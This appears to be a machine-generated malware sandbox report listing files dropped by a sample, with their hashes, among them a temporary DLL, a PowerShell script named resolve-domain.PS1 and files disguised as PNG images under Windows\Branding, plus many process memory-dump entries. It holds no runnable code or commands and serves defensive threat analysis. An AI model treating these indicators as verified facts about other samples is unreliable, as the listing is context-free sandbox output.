\??\c:\Users\Admin\AppData\Local\Temp\wxut4r0f\CSC249ECC34788B4231A934D2558BAC15C4.TMP

MD5 1f40172eba3b5579f8cc7eccc557eac1
SHA1 4a04161e88a51b9029f497cca84033aa84609f49
SHA256 871d297b3961f15056068cffbf3d2cf85465a6cc8e4cf7adbcee9ba8c1ec2dcf
SHA512 bbf73144805d73ee468a053bb4f5e2c94b71a705e2616960eb77a0cf29e02209c7551911de84e4eaba17165ac85ddb25f0847013654352c8f88e4a5593d19373

C:\Users\Admin\AppData\Local\Temp\RES9A23.tmp

MD5 5fd98d205c7de7af5ed82341da8cb621
SHA1 ce18c2a3e25829ef7017c48b0193f9ed96304293
SHA256 17061c224774fed1282505677200c13016a01711c9d66b01a83fb62483a52e87
SHA512 ab3773366a74731820ccd77c32bdc744a996b2b4925dca95b7873282c9e68815bded221338d81d1b01502f3a6fd501a532bbf23cb3b50d090167181383827449

C:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.dll

MD5 e8498786994f6fa8fc41e56a5fcd9548
SHA1 07b3bac8b1d638715716f2e9e259cf0bbbb870ce
SHA256 8f45375b297c8f997c761a05559811d0f2ed9721a1c7bc98aa56270ff9c7789b
SHA512 9186c5438da7a190f06437fe8e37ef1a15300871f8996242385fae8317f498ba355c91a94f487dda836895f99eac8c83cad03d23a8383f7e65edaa91db31766f

memory/2916-144-0x000001E5C7F80000-0x000001E5C7F81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 00fb904b2dd958760943b89400e9b7f9
SHA1 8c825862b6f70cbaef991525f31100f713e61e7d
SHA256 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512 ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

memory/2916-150-0x000001E5C8560000-0x000001E5C8561000-memory.dmp

memory/2916-151-0x000001E5C7E78000-0x000001E5C7E79000-memory.dmp

memory/2916-152-0x000001E5C88F0000-0x000001E5C88F1000-memory.dmp

memory/3836-159-0x0000000000000000-mapping.dmp

memory/3836-168-0x000001E1FE910000-0x000001E1FE912000-memory.dmp

memory/3836-169-0x000001E1FE913000-0x000001E1FE915000-memory.dmp

memory/3836-172-0x000001E1FE916000-0x000001E1FE918000-memory.dmp

memory/3756-201-0x0000000000000000-mapping.dmp

memory/3836-208-0x000001E1FE918000-0x000001E1FE91A000-memory.dmp

memory/3756-209-0x000001E6BBF70000-0x000001E6BBF72000-memory.dmp

memory/3756-210-0x000001E6BBF73000-0x000001E6BBF75000-memory.dmp

memory/3756-235-0x000001E6BBF76000-0x000001E6BBF78000-memory.dmp

memory/1736-240-0x0000000000000000-mapping.dmp

memory/3756-271-0x000001E6BBF78000-0x000001E6BBF7A000-memory.dmp

memory/1736-272-0x000002779E380000-0x000002779E382000-memory.dmp

memory/1736-276-0x000002779E386000-0x000002779E388000-memory.dmp

memory/1736-273-0x000002779E383000-0x000002779E385000-memory.dmp

memory/1736-291-0x000002779E388000-0x000002779E38A000-memory.dmp

memory/2532-301-0x0000000000000000-mapping.dmp

memory/2996-302-0x0000000000000000-mapping.dmp

memory/3968-303-0x0000000000000000-mapping.dmp

memory/2788-340-0x0000000000000000-mapping.dmp

memory/576-341-0x0000000000000000-mapping.dmp

memory/196-344-0x0000000000000000-mapping.dmp

memory/1300-345-0x0000000000000000-mapping.dmp

memory/3028-346-0x0000000000000000-mapping.dmp

memory/2532-347-0x0000000000000000-mapping.dmp

memory/2996-348-0x0000000000000000-mapping.dmp

memory/3080-349-0x0000000000000000-mapping.dmp

memory/3832-350-0x0000000000000000-mapping.dmp

memory/1844-351-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 b110f38845e18a04ab59a7d8a134ef40
SHA1 8119030034e6fbe62d875e824b5233c1f29d61a0
SHA256 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA512 80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

\Windows\Branding\mediasvc.png

MD5 5768a809b9fcbff117dffa8cbf2e8852
SHA1 a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA256 8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA512 99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

memory/1188-354-0x0000000000000000-mapping.dmp

memory/2260-355-0x0000000000000000-mapping.dmp

memory/2516-356-0x0000000000000000-mapping.dmp

memory/1300-357-0x0000000000000000-mapping.dmp

memory/2264-358-0x0000000000000000-mapping.dmp

memory/4076-359-0x0000000000000000-mapping.dmp

memory/1420-360-0x0000000000000000-mapping.dmp

memory/3292-361-0x0000000000000000-mapping.dmp

memory/1520-362-0x0000000000000000-mapping.dmp

memory/2172-363-0x0000000000000000-mapping.dmp

memory/1300-364-0x0000000000000000-mapping.dmp

memory/196-365-0x0000000000000000-mapping.dmp

memory/3968-366-0x0000000000000000-mapping.dmp

memory/1300-367-0x0000000000000000-mapping.dmp

memory/192-368-0x0000000000000000-mapping.dmp

memory/4076-369-0x0000000000000000-mapping.dmp

memory/4076-383-0x0000025276E03000-0x0000025276E05000-memory.dmp

memory/4076-382-0x0000025276E00000-0x0000025276E02000-memory.dmp

memory/4076-384-0x0000025276E06000-0x0000025276E08000-memory.dmp

memory/4076-435-0x0000025276E08000-0x0000025276E09000-memory.dmp

memory/2972-448-0x0000000000000000-mapping.dmp

memory/2264-449-0x0000000000000000-mapping.dmp

memory/2172-492-0x0000000000000000-mapping.dmp

memory/2848-493-0x0000000000000000-mapping.dmp

memory/3472-494-0x0000000000000000-mapping.dmp

memory/188-495-0x0000000000000000-mapping.dmp